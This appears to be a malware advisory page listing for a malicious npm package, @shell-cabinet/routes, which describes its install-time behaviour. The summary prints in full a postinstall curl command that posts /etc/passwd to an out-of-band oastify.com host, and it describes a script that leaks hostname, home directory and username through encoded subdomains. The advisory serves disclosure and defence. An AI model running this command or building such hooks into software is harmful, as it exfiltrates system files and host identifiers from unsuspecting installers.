@shell-cabinet/routes @99.9.5
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-5428
Ecosystem
npm
Summary
On npm install , the package's postinstall hook runs curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com , posting the installer's /etc/passwd to a hostname-prefixed subdomain of oastify.com (a Burp Collaborator out-of-band channel). The same postinstall first executes scripts/scream3gg.js , which hex-encodes os.hostname() , os.homedir() , and os.userInfo().username and issues plain-HTTP fetch() requests with the hex chunked into subdomains of nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com , leaking host identifiers over DNS-encoded HTTP. Both behaviors fire unconditionally at install time and have no relationship to any documented package functionality.
Source: amazon-inspector (b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.